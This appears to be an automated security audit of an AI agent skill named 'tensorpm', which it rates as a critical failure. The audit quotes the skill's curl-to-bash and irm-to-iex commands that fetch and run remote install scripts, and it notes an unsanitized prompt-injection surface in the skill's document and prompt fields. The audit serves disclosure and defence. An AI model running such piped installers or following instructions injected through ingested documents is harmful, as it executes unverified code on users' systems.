tensorpm
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [Unverifiable Dependencies & Remote Code Execution] (CRITICAL): In SKILL.md, the skill instructs users to run 'curl -fsSL https://raw.githubusercontent.com/Neo552/TensorPM/main/scripts/install.sh | bash'. This pattern facilitates unverified code execution from an untrusted GitHub repository (Neo552 is not a trusted organization).\n- [Unverifiable Dependencies & Remote Code Execution] (CRITICAL): In SKILL.md, the skill instructs users to run 'irm https://raw.githubusercontent.com/Neo552/TensorPM/main/scripts/install.ps1 | iex', which is a high-risk remote execution method for Windows environments.\n- [Unverifiable Dependencies & Remote Code Execution] (HIGH): The skill promotes the installation of the TensorPM desktop application via 'brew', 'winget', and direct binary downloads from the 'Neo552/TensorPM-Releases' repository. As the source is untrusted, these installers are unverified and potentially malicious.\n- [Indirect Prompt Injection] (LOW): The skill possesses an indirect prompt injection surface through project creation tools that ingest external data. Evidence: 1. Ingestion: 'documentPath' and 'prompt' fields in MCP-TOOLS.md and A2A-API.md. 2. Boundary markers: Absent; no delimiters or warnings for embedded instructions. 3. Capability inventory: Localhost network operations (A2A API) and structured project state modification via MCP. 4. Sanitization: No sanitization or validation logic is documented.
Recommendations
- HIGH: Downloads and executes remote code from: https://raw.githubusercontent.com/Neo552/TensorPM/main/scripts/install.sh - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata